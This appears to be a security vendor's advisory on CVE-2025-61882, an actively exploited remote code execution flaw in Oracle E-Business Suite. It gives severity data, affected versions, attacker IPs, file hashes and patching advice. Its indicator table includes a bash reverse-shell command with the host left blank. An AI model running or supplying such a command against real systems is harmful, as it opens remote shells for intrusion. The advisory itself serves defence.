Threats Vulnerabilities

CVE-2025-61882: Critical E-Business Suite zero-day vulnerability

Written by Pratik Surendra Bhosale | Oct 10, 2025 12:01:21 PM

Observation Summary

Oracle has released an advisory about a critical E-Business Suite zero-day vulnerability CVE-2025-61882 that allows attackers to perform unauthenticated remote code execution, with the flaw actively exploited in Clop data theft attacks.

What’s Happening

CVE-2025-61882 is a critical zero-day vulnerability in Oracle E-Business Suite, allowing unauthenticated remote code execution, which has been actively exploited by the Clop ransomware group It has a high CVSS score of 9.8, indicating an urgent security risk due to its potential for exploitation over the network without requiring any authentication.

CVSSv3 score: 9.8 (Critical)

Score as per Recorded Future: 99

Affected Product: Oracle E-Business Suite (EBS)

Component: Concurrent Processing – BI Publisher Integration

Attack Vector: Remote, unauthenticated (no username/password required)

First Reported: Oct 5, 2025

Affected Products and Versions: Oracle E-Business Suite, versions 12.2.3-12.2.14

Indicators of Compromise (IOCs)

Indicator Type Description
200[.]107[.]207.26 IP Potential GET and POST activity
185[.]181[.]60.11 IP Potential GET and POST activity
sh -c /bin/bash -i >& /dev/tcp// 0>&1 Command Establish an outbound TCP connection over a specific port
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 SHA256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b SHA256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Why It Matters

The exploitation of CVE-2025-61882 can result in

  • Attackers gain shell access to Oracle EBS servers, enabling installation of malware, data exfiltration, and privilege escalation.
  • Oracle EBS is often central to enterprise operations (finance, HR, procurement). Downtime can halt critical workflows.
  • If EBS is integrated with external vendors or partners, compromise may extend beyond the organization

Recommendations

  • Apply Oracle’s Critical Patch Update (CPU) for prerequisite fixes.
  • Apply the Emergency Patch for CVE-2025-61882 available via My Oracle Support (Doc ID: 30061882.1)
  • Block public access to EBS BI Publisher endpoints if not required
  • Use Web Application Firewalls (WAFs) to detect and block suspicious payloads
  • Enable verbose logging for BI Publisher and Concurrent Manager
  • Audit recent changes to EBS configuration files and deployed servlets